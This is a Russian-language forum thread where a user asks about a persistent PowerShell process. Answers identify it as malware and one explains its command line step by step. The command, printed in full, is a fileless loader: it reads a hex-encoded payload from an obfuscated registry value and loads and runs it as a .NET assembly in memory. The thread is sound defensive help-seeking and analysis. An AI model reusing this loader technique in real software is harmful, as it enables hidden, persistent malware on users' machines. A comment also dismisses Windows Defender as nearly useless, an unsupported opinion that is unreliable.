Что бы значил такой процесс?

Question

[Nordman99]

Всем привет, подскажите, застукал у себя на компе процесс павершелла запущенный с такими параметрами:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;$_b=$_b.replace('Р•','E');[byte[]]$_0 = DE0PB($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Если его прибить то после перезагрузки он запускается снова, отследить что его запускает не могу - нигде ни в какой автозагрузке не вижу никого скрипта запуска этого процесса, поиск по всему реестру по записи powrshell.exe тоже результатов не дал, записи о powershell.exe есть но не с такими параметрами запуска, утилита autoruns.exe из Sysinternals тоже ничего не показала, в планировщике задач тоже не увидел ничего запускающего павершелл с такими параметрами, подскажите какие еще есть способы выяснить что запускает этот процесс павершелла?
И самое главное - что весь этот процесс с этими параметрами значит комуто это чтото говорит?
Очень смахивает на нездоровую вирусную активность, вроде Защитник Винды стоит и работает

Comments

[Дмитрий Добрышин]

Сначала посмотрите, что в реестре
HKEY_CURRENT_USER\Software\Microsoft
содержится в той записи, которая неудобочитаема.
Судя по тому, что видно, зараза запускается из под пользователя, и себя держит в каталоге пользователя.
Скорее всего в %temp% или %appdata% Но в последнем случае нужно смотреть в каком именно каталоге спряталась.

[Keffer]

вроде Защитник Винды стоит и работает

Я вас умоляю, от защитника винды пользы чуть менее чем ноль. Только ресурсы потребляет бесполезно. Но тем не менее, юзвери продолжают на него чуть ли не молиться.

Особо умиляют (до слез!) те, кому в магазинах в нагрузку к новой мобилке умудряются еще и антивирус впарить туда, за отдельную плату примерно в 1/10 от цены мобилки)))

Answer 1

[azarij]

да, какую-то заразу поймали:
https://www.joesandbox.com/analysis/188751/1/html
я бы не искал откуда оно, а отформатировал систему и начал бы с нуля. отличный повод.
поискать можно, конечно, и почистить, но где гарантия, что вычистите на 100%?

Comments

[dollar]

Поискать полезно в оффлайне, чтобы понять пути заражения.
Конечно, не факт, что удастся найти следы и понять причину, но попытка не пытка.

Answer 2

[alhaos]

function DE0PB([string]$s) {
   $H = @()
   for ($i = 0; $i -lt $s.Length; $i += 2) {
      $H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
   };
   return $H; 
};
# функция распарсивает строку записаную hex симвалами по два в байты
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# зачение ключа реестра в $_b
$_b = $_b.replace('Р•', 'E');
# замена в нем Р• на E
[byte[]]$_0 = DE0PB($_b);
# строковое значение распарсивается на байты
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# тут она запускается )))

Answer 3

[CityCat4]

Если вдруг на твой компьютер просочился злобный вирус...